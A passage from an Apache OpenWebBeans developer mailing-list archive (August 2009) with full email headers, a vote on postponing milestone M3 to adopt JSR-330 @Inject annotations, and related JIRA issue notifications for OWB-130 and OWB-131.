(161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 09:18:22 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web38206.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 20 Aug 2009 09:18:10 +0000 Received: (qmail 77161 invoked by uid 60001); 20 Aug 2009 09:17:49 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1250759869; bh=jJ5ENKaWDFVdsH6UEvkzk9LrFxkLVdkzk8CYfh67FOY=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=hlgwajlBU6FzSTnUkHOcM00qRC5YFlST42OoGyo4uf8/XPEl6RLuTkH5PLcF7GDYdrwfmUIj22tv5SWYwhNurZrhE6WN8ijsL2AHZObA211Q79DMRuTM2OhNqBJ18aFiS4YP4ydeh1QN/qDTXC0vrG7+dDHrocZQMXH66Y0tEZs= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=Xm1rgEzeTEa0RVWn0j7y8J82c+lJvk5s5Ji1NVA7wR0JhQrS4Ar9cq907ihhVRB9gmyvhc1V7pL7HzunWKqBpzlxIy0vt6sr52n3EwSLH7HUDkCTC+HghBKJIiVCC+0nuQ+2LRbXVJGz9wNZDW7gGdByhZoBlOrFH7R/H7NQwRo=; Message-ID: <[email protected]> X-YMail-OSG: wfJdaGcVM1l2JKEsZWyNOsg8SXo2zc2dCoDJuiRg9.PrsrM5cPr.NMS8pt.qE1Mdu0FAOz_JiWE38vWgSA4hihkEuqI2C91cVQhRhmZ1TW0k3cANNmZcY_H1Xpf_Or93GPH4QKbegVTWYH9C3DefZjVBY7ioJEIKXO7fZT2RJHEIqIAp_qWzp210tM2p2Qjo7lteYM8EDa..Kf_YRjmM4Knz0TM.ZElhFq.O9JcU1OYJZZAWmn59GWgQrrMOyXFO_tv9kITjw6bofpv5Pv4uncDCE3e.4TuVM86Dxo.v4VFnbrqeYEkZ0TxJXf5wENMbzg1Unmb3bkatRT9ZtXJ2f6KCqipU1qD6q5onmrk- Received: from [161.129.204.104] by web38206.mail.mud.yahoo.com via HTTP; Thu, 20 Aug 2009 02:17:49 PDT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.338.2 References: <[email protected]> <[email protected]> Date: Thu, 20 Aug 2009 02:17:49 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Re: postpone of M3 To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-994317806-1250759869=:77025" X-Virus-Checked: Checked by ClamAV on apache.org --0-994317806-1250759869=:77025 Content-Type: text/plain; charset=us-ascii +1. But we really work a bit more to release end of this month. And also I discussed with David Blevins from OpenEJB about OpenWebBeans integration. He said that he will create a new thread for further discussion about integration of OpenWebBeans with Geronimo. Integration may be a bit harder than we think. Thanks; --Gurkan ________________________________ From: Mark Struberg <[email protected]> To: [email protected] Sent: Thursday, August 20, 2009 2:45:28 AM Subject: Re: postpone of M3 Sorry, it's really late here - forgot to call a vote ;) [+1] yes, postpone and hack the JSR-330 changes as quick as possible [0] don't care [-1] no, realease OWB M3 as it currently is +1 aka let's get JSR-330 on board from me LieGrue, strub ----- Original Message ---- > From: Mark Struberg <[email protected]> > To: [email protected] > Sent: Thursday, August 20, 2009 1:40:09 AM > Subject: postpone of M3 > > Hi! > > Gurkan, Jean-Louis and I had a discusson on IRC abouth whether we should wait > with the M3 and hack all the new changes from yesterdays spec into it before we > do the release. The changes are mainly caused by JSR-330. > > The JSR-299 spec now additionally depends on the JSR-330 @Inject specification. > To satisfy this requirement, I'd suggest to introduce a new package > 'atinject-api' which may later be moved to geronimo-specs (clarified this with > David Jencks and David Blevins). This new package should contain onle the few > annotations defined in JSR-330. It currently will get the openwebbeans-parent as > all other OWB modules. > The following annotations are part of this module > javax.inject.Inject > javax.inject.Qualifier > javax.inject.Named > javax.inject.Scope > javax.inject.Singleton > > The webbeans-api module will get a dependency to this new atinject-api artifact > and use that annotations instead of the 'old' WB annotations. > The following annotations will be 'replaced' basically: > @Current -> @Inject > @BindingType -> @Qualifier > @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have the > 'normal' and 'passivating' attributes) This is now unclear btw... > @Singleton will be a new Scope > > The atinject-api and webbeans-api should get the openwebbeans-parent for now, > and will get geronimo-spec-parent after they have moved. > > That's it basically :) > > LieGrue, > strub --0-994317806-1250759869=:77025-- From [email protected] Thu Aug 20 10:00:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75991 invoked from network); 20 Aug 2009 10:00:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2009 10:00:31 -0000 Received: (qmail 9111 invoked by uid 500); 20 Aug 2009 10:00:50 -0000 Delivered-To: [email protected] Received: (qmail 9096 invoked by uid 500); 20 Aug 2009 10:00:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9086 invoked by uid 99); 20 Aug 2009 10:00:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 10:00:50 +0000 X-ASF-Spam-Status: No, hits=-1.0 required=10.0 tests=RCVD_IN_DNSWL_LOW,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO smtp1.mail.atosorigin.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 10:00:40 +0000 Received: from filter.atosorigin.com (localhost [161.129.204.104]) by mxfed001 (Postfix) with ESMTP id E41A6202CAC2 for <[email protected]>; Thu, 20 Aug 2009 12:00:18 +0200 (CEST) Received: from mail.awl.fr.atosorigin.com (serv-smtp-wse01.fr.atosworldline.com [161.129.204.104]) (using TLSv1 with cipher RC4-MD5 (128/128 bits)) (Client CN "mail.awl.fr.atosorigin.com", Issuer "RSA Data Security, Inc." (verified OK)) by mxfed001 (Postfix) with ESMTP id DF01820000BF for <[email protected]>; Thu, 20 Aug 2009 12:00:18 +0200 (CEST) Received: from frspx301.fr01.awl.atosorigin.net (161.129.204.104) by frspx401.priv.atos.fr (161.129.204.104) with Microsoft SMTP Server (TLS) id 8.1.358.0; Thu, 20 Aug 2009 11:58:15 +0200 Received: from frvdx202.fr01.awl.atosorigin.net (161.129.204.104) by frspx301.fr01.awl.atosorigin.net (161.129.204.104) with Microsoft SMTP Server (TLS) id 8.1.358.0; Thu, 20 Aug 2009 12:00:18 +0200 Received: from FRVDX100.fr01.awl.atosorigin.net ([161.129.204.104]) by frvdx202.fr01.awl.atosorigin.net ([161.129.204.104]) with mapi; Thu, 20 Aug 2009 12:00:18 +0200 From: Monteiro Jean-Louis <[email protected]> To: "[email protected]" <[email protected]> Date: Thu, 20 Aug 2009 12:00:17 +0200 Subject: RE: postpone of M3 Thread-Topic: postpone of M3 Thread-Index: AcohdzAst6PJ2MH9S9msUUhzCSzorwABa07Q Message-ID: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Accept-Language: fr-FR, en-US Content-Language: fr-FR X-MS-Has-Attach: X-MS-TNEF-Correlator: acceptlanguage: fr-FR, en-US Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable MIME-Version: 1.0 X-Virus-Checked: Checked by ClamAV on apache.org Note able to vote. Just for your information, here is the related post. http://www.nabble.com/Webapp-Annotation-processing-for-299-td25052625s134.h= tml Regards, Jean-Louis -----Message d'origine----- De : Gurkan Erdogdu [mailto:[email protected]] Envoy=E9 : jeudi 20 ao=FBt 2009 11:18 =C0 : [email protected] Objet : Re: postpone of M3 +1. But we really work a bit more to release end of this month. And also I disc= ussed with David Blevins from OpenEJB about OpenWebBeans integration. He sa= id that he will create a new thread for further discussion about integratio= n of OpenWebBeans with Geronimo. Integration may be a bit harder than we t= hink. Thanks; --Gurkan ________________________________ From: Mark Struberg <[email protected]> To: [email protected] Sent: Thursday, August 20, 2009 2:45:28 AM Subject: Re: postpone of M3 Sorry, it's really late here - forgot to call a vote ;) [+1] yes, postpone and hack the JSR-330 changes as quick as possible [0] don't care [-1] no, realease OWB M3 as it currently is +1 aka let's get JSR-330 on board from me LieGrue, strub ----- Original Message ---- > From: Mark Struberg <[email protected]> > To: [email protected] > Sent: Thursday, August 20, 2009 1:40:09 AM > Subject: postpone of M3 > > Hi! > > Gurkan, Jean-Louis and I had a discusson on IRC abouth whether we should = wait > with the M3 and hack all the new changes from yesterdays spec into it bef= ore we > do the release. The changes are mainly caused by JSR-330. > > The JSR-299 spec now additionally depends on the JSR-330 @Inject specific= ation. > To satisfy this requirement, I'd suggest to introduce a new package > 'atinject-api' which may later be moved to geronimo-specs (clarified this= with > David Jencks and David Blevins). This new package should contain onle the= few > annotations defined in JSR-330. It currently will get the openwebbeans-pa= rent as > all other OWB modules. > The following annotations are part of this module > javax.inject.Inject > javax.inject.Qualifier > javax.inject.Named > javax.inject.Scope > javax.inject.Singleton > > The webbeans-api module will get a dependency to this new atinject-api ar= tifact > and use that annotations instead of the 'old' WB annotations. > The following annotations will be 'replaced' basically: > @Current -> @Inject > @BindingType -> @Qualifier > @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have the > 'normal' and 'passivating' attributes) This is now unclear btw... > @Singleton will be a new Scope > > The atinject-api and webbeans-api should get the openwebbeans-parent for = now, > and will get geronimo-spec-parent after they have moved. > > That's it basically :) > > LieGrue, > strub Ce message et les pi=E8ces jointes sont confidentiels et r=E9serv=E9s =E0 l= 'usage exclusif de ses destinataires. Il peut =E9galement =EAtre prot=E9g= =E9 par le secret professionnel. Si vous recevez ce message par erreur, mer= ci d'en avertir imm=E9diatement l'exp=E9diteur et de le d=E9truire. L'int= =E9grit=E9 du message ne pouvant =EAtre assur=E9e sur Internet, la responsa= bilit=E9 du groupe Atos Origin ne pourra =EAtre recherch=E9e quant au conte= nu de ce message. Bien que les meilleurs efforts soient faits pour mainteni= r cette transmission exempte de tout virus, l'exp=E9diteur ne donne aucune = garantie =E0 cet =E9gard et sa responsabilit=E9 ne saurait =EAtre recherch= =E9e pour tout dommage r=E9sultant d'un virus transmis. This e-mail and the documents attached are confidential and intended solely= for the addressee; it may also be privileged. If you receive this e-mail i= n error, please notify the sender immediately and destroy it. As its integr= ity cannot be secured on the Internet, the Atos Origin group liability cann= ot be triggered for the message content. Although the sender endeavours to = maintain a computer virus-free network, the sender does not warrant that th= is transmission is virus-free and will not be liable for any damages result= ing from any virus transmitted. From [email protected] Thu Aug 20 15:05:51 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16555 invoked from network); 20 Aug 2009 15:05:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2009 15:05:44 -0000 Received: (qmail 87569 invoked by uid 500); 20 Aug 2009 15:06:03 -0000 Delivered-To: [email protected] Received: (qmail 87553 invoked by uid 500); 20 Aug 2009 15:06:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87523 invoked by uid 99); 20 Aug 2009 15:06:01 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 15:06:01 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f208.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 15:05:52 +0000 Received: by ewy4 with SMTP id 4so1719982ewy.27 for <[email protected]>; Thu, 20 Aug 2009 08:05:31 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=i3kdmewhUS+W9GaRTe56IzNfe9/fT6JqRwyvnY2QBt8=; b=NGATIGjFhaO90ubSLexIVqHgXVv2PFBmw4rwXKbZ7lGMegOb+Icv2lO9RPM85Bw/o7 RJf5bZe2KtcvfOVMmy8f36jb1LuIMrTpXPb2k8zKbLvLSyUvDexavq27u8DV2FvK/Q79 Izo+7KIhXxDFZ81TRIVPM9WvAl6kSKM746DIc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=COJDvD/rypbi3KYNuKMzV5glizP/Wr4hDL2G/L9ku7QDyqgZhpfR7BmVCMaUZzp321 f5UC/1m7+PYF95F4ysHYGKpzIwoyEErJnmrwSHjrGw+Cf6XqqYV7x47KpHFRgV1nJUP2 S5vLAXHiQ60otiFviKvLHRGSw/j117PqqX5hU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id c3mr187552ebb.16.1250780730896; Thu, 20 Aug 2009 08:05:30 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 20 Aug 2009 18:05:30 +0300 Message-ID: <[email protected]> Subject: Re: postpone of M3 From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c461628362f047194152d X-Virus-Checked: Checked by ClamAV on apache.org --0015174c461628362f047194152d Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Thanks Jean-Louis for reminder. Folks, please register with dev@geronimo to join on discussions. Thanks; --Gurkan 2009/8/20 Monteiro Jean-Louis <[email protected]> > Note able to vote. > Just for your information, here is the related post. > > > http://www.nabble.com/Webapp-Annotation-processing-for-299-td25052625s134= .html > > Regards, > Jean-Louis > > -----Message d'origine----- > De : Gurkan Erdogdu [mailto:[email protected]] > Envoy=E9 : jeudi 20 ao=FBt 2009 11:18 > =C0 : [email protected] > Objet : Re: postpone of M3 > > +1. > > But we really work a bit more to release end of this month. And also I > discussed with David Blevins from OpenEJB about OpenWebBeans integration.= He > said that he will create a new thread for further discussion about > integration of OpenWebBeans with Geronimo. Integration may be a bit hard= er > than we think. > > Thanks; > > --Gurkan > > > > > ________________________________ > From: Mark Struberg <[email protected]> > To: [email protected] > Sent: Thursday, August 20, 2009 2:45:28 AM > Subject: Re: postpone of M3 > > Sorry, it's really late here - forgot to call a vote ;) > > [+1] yes, postpone and hack the JSR-330 changes as quick as possible > [0] don't care > [-1] no, realease OWB M3 as it currently is > > > +1 aka let's get JSR-330 on board from me > > LieGrue, > strub > > > > ----- Original Message ---- > > From: Mark Struberg <[email protected]> > > To: [email protected] > > Sent: Thursday, August 20, 2009 1:40:09 AM > > Subject: postpone of M3 > > > > Hi! > > > > Gurkan, Jean-Louis and I had a discusson on IRC abouth whether we shoul= d > wait > > with the M3 and hack all the new changes from yesterdays spec into it > before we > > do the release. The changes are mainly caused by JSR-330. > > > > The JSR-299 spec now additionally depends on the JSR-330 @Inject > specification. > > To satisfy this requirement, I'd suggest to introduce a new package > > 'atinject-api' which may later be moved to geronimo-specs (clarified th= is > with > > David Jencks and David Blevins). This new package should contain onle t= he > few > > annotations defined in JSR-330. It currently will get the > openwebbeans-parent as > > all other OWB modules. > > The following annotations are part of this module > > javax.inject.Inject > > javax.inject.Qualifier > > javax.inject.Named > > javax.inject.Scope > > javax.inject.Singleton > > > > The webbeans-api module will get a dependency to this new atinject-api > artifact > > and use that annotations instead of the 'old' WB annotations. > > The following annotations will be 'replaced' basically: > > @Current -> @Inject > > @BindingType -> @Qualifier > > @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have t= he > > 'normal' and 'passivating' attributes) This is now unclear btw... > > @Singleton will be a new Scope > > > > The atinject-api and webbeans-api should get the openwebbeans-parent fo= r > now, > > and will get geronimo-spec-parent after they have moved. > > > > That's it basically :) > > > > LieGrue, > > strub > > > > > > Ce message et les pi=E8ces jointes sont confidentiels et r=E9serv=E9s =E0= l'usage > exclusif de ses destinataires. Il peut =E9galement =EAtre prot=E9g=E9 par= le secret > professionnel. Si vous recevez ce message par erreur, merci d'en avertir > imm=E9diatement l'exp=E9diteur et de le d=E9truire. L'int=E9grit=E9 du me= ssage ne > pouvant =EAtre assur=E9e sur Internet, la responsabilit=E9 du groupe Atos= Origin > ne pourra =EAtre recherch=E9e quant au contenu de ce message. Bien que le= s > meilleurs efforts soient faits pour maintenir cette transmission exempte = de > tout virus, l'exp=E9diteur ne donne aucune garantie =E0 cet =E9gard et sa > responsabilit=E9 ne saurait =EAtre recherch=E9e pour tout dommage r=E9sul= tant d'un > virus transmis. > > This e-mail and the documents attached are confidential and intended sole= ly > for the addressee; it may also be privileged. If you receive this e-mail = in > error, please notify the sender immediately and destroy it. As its integr= ity > cannot be secured on the Internet, the Atos Origin group liability cannot= be > triggered for the message content. Although the sender endeavours to > maintain a computer virus-free network, the sender does not warrant that > this transmission is virus-free and will not be liable for any damages > resulting from any virus transmitted. > > --=20 Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --0015174c461628362f047194152d-- From [email protected] Thu Aug 20 22:11:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49128 invoked from network); 20 Aug 2009 22:11:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2009 22:11:19 -0000 Received: (qmail 5362 invoked by uid 500); 20 Aug 2009 22:11:38 -0000 Delivered-To: [email protected] Received: (qmail 5351 invoked by uid 500); 20 Aug 2009 22:11:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5341 invoked by uid 99); 20 Aug 2009 22:11:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 22:11:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 22:11:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 019DF29A0013 for <[email protected]>; Thu, 20 Aug 2009 15:11:15 -0700 (PDT) Message-ID: <1965431788.1250806275005.JavaMail.jira@brutus> Date: Thu, 20 Aug 2009 15:11:15 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-130) implement JSR-330 annotations for OWB MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org implement JSR-330 annotations for OWB ------------------------------------- Key: OWB-130 URL: https://issues.apache.org/jira/browse/OWB-130 Project: OpenWebBeans Issue Type: New Feature Components: Core Affects Versions: M3 Reporter: Mark Struberg Assignee: Mark Struberg Fix For: M3 Since the latest spec from 2009-08-17, JSR-299 is depending on JSR-330. We should reflect this fact by introducing a new package atinject-api and add it as dependency to webbeans-api -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Aug 20 22:19:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50839 invoked from network); 20 Aug 2009 22:19:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2009 22:19:17 -0000 Received: (qmail 11329 invoked by uid 500); 20 Aug 2009 22:19:36 -0000 Delivered-To: [email protected] Received: (qmail 11312 invoked by uid 500); 20 Aug 2009 22:19:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11302 invoked by uid 99); 20 Aug 2009 22:19:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 22:19:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 22:19:34 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D0061234C004 for <[email protected]>; Thu, 20 Aug 2009 15:19:14 -0700 (PDT) Message-ID: <+1-651-683-8696.1250806754837.JavaMail.jira@brutus> Date: Thu, 20 Aug 2009 15:19:14 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (OWB-130) implement JSR-330 annotations for OWB In-Reply-To: <1965431788.1250806275005.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-130?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Mark Struberg resolved OWB-130. ------------------------------- Resolution: Fixed > implement JSR-330 annotations for OWB > ------------------------------------- > > Key: OWB-130 > URL: https://issues.apache.org/jira/browse/OWB-130 > Project: OpenWebBeans > Issue Type: New Feature > Components: Core > Affects Versions: M3 > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M3 > > > Since the latest spec from 2009-08-17, JSR-299 is depending on JSR-330. > We should reflect this fact by introducing a new package atinject-api and add it as dependency to webbeans-api -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Aug 20 22:21:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51289 invoked from network); 20 Aug 2009 22:21:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2009 22:21:17 -0000 Received: (qmail 12192 invoked by uid 500); 20 Aug 2009 22:21:36 -0000 Delivered-To: [email protected] Received: (qmail 12160 invoked by uid 500); 20 Aug 2009 22:21:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12144 invoked by uid 99); 20 Aug 2009 22:21:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 22:21:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 20 Aug 2009 22:21:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id F3FBD29A001D for <[email protected]>; Thu, 20 Aug 2009 15:21:14 -0700 (PDT) Message-ID: <80121743.1250806874998.JavaMail.jira@brutus> Date: Thu, 20 Aug 2009 15:21:14 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-131) integrate new JSR-330 annotations within OWB MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org integrate new JSR-330 annotations within OWB -------------------------------------------- Key: OWB-131 URL: https://issues.apache.org/jira/browse/OWB-131 Project: OpenWebBeans Issue Type: New Feature Components: Core Affects Versions: M2 Reporter: Mark Struberg Assignee: Mark Struberg Fix For: M3 The JSR-330 annotations from the new spec are replacing functionality from a few now obsolete annotations: @Current -> @Inject @BindingType -> @Qualifier @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have the 'normal' and 'passivating' attributes) This is now unclear btw... @Singleton will be a new Scope -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Aug 21 05:55:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50721 invoked from network); 21 Aug 2009 05:55:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Aug 2009 05:55:53 -0000 Received: (qmail 24083 invoked by uid 500); 21 Aug 2009 05:56:12 -0000 Delivered-To: [email protected] Received: (qmail 24061 invoked by uid 500); 21 Aug 2009 05:56:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 24051 invoked by uid 99); 21 Aug 2009 05:56:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Aug 2009 05:56:12 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ey-out-1920.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 21 Aug 2009 05:56:04 +0000 Received: by ey-out-1920.google.com with SMTP id 13so121035eye.54 for <[email protected]>; Thu, 20 Aug 2009 22:55:43 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=sAyanLrmfDp7ZG7RDuTm9JLSJ9pGFwjI847ZUdxqHYo=; b=Qz4yitiBAr4YgtFePAGKEZySb9WsNQ9/EkjOMP07InbCslTF2QNWTnB6gtnCAKGUPj 3TmByGNIQ9sKI8a2fs+0oA1MeaH0PBaB6QlCy6JztSw7OrVsT+emmr0E3hMZ3HW7bs2C EZS8ZIP5qpLORK7aYPFn2QkGYis1XrvvvTZXI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=MQd0+FRlkfYSpfKxeXBuq2l3G90RhoapTvEsHm9SfUBa9YhBQdU0+3nm1PKj36tKnU pB1JX237wFjLW68AZ4rOHaAnv6DU8uaWWdwvjOK/QDB+Ieo/2CNZpYr3pVWWXKs6iL77 laZ672rmV0yFQIwgte2ugyTt1QVSYpgKm9VMc= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id s11mr1026217ebo.33.1250834143036; Thu, 20 Aug 2009 22:55:43 -0700 (PDT) In-Reply-To: <80121743.1250806874998.JavaMail.jira@brutus> References: <80121743.1250806874998.JavaMail.jira@brutus> Date: Fri, 21 Aug 2009 08:55:43 +0300 Message-ID: <[email protected]> Subject: Re: [jira] Created: (OWB-131) integrate new JSR-330 annotations within OWB From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015174c341ac4c4a20471a084d9 X-Virus-Checked: Checked by ClamAV on apache.org --0015174c341ac4c4a20471a084d9 Content-Type: text/plain; charset=ISO-8859-1 Hey Mark; I have been lots of change because of Resource Handling. Please commit your changes after my check in. Otherwise we may get lots of conflicts. I will try to check in my changes until tomorrow. Thanks; --Gurkan 2009/8/21 Mark Struberg (JIRA) <[email protected]> > integrate new JSR-330 annotations within OWB > -------------------------------------------- > > Key: OWB-131 > URL: https://issues.apache.org/jira/browse/OWB-131 > Project: OpenWebBeans > Issue Type: New Feature > Components: Core > Affects Versions: M2 > Reporter: Mark Struberg > Assignee: Mark Struberg > Fix For: M3 > > > The JSR-330 annotations from the new spec are replacing functionality from > a few now obsolete annotations: > > @Current -> @Inject > @BindingType -> @Qualifier > @ScopeType -> @Scope + @NormalScope (javax.inject.Scope doesn't have the > 'normal' and 'passivating' attributes) This is now unclear btw... > @Singleton will be a new Scope > > -- > This message is automatically generated by 